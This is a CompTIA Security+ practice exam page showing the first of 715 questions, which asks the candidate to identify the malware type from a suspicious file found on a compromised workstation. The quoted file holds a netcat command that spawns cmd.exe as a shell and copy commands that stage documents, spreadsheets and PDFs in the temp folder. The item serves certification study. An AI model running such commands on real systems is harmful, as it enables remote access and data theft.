comptia security+

715 Questions

You can start the exam to practice all questions related to this exam.

Question No. 1

A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look suspicious.

One of the files contains the following commands:

cmd /C %TEMP%\nc -e cmd.exe

copy    *.doc    > %TEMP%\docfiles.zip

copy    *.xls    > %TEMP%\xlsfiles.zip

copy    *.pdf    > %TEMP%\pdffiles.zip

Which of the following types of malware was used? 

Choose the correct option from the given list.
01 / 715

0 Discussions

Trending Exams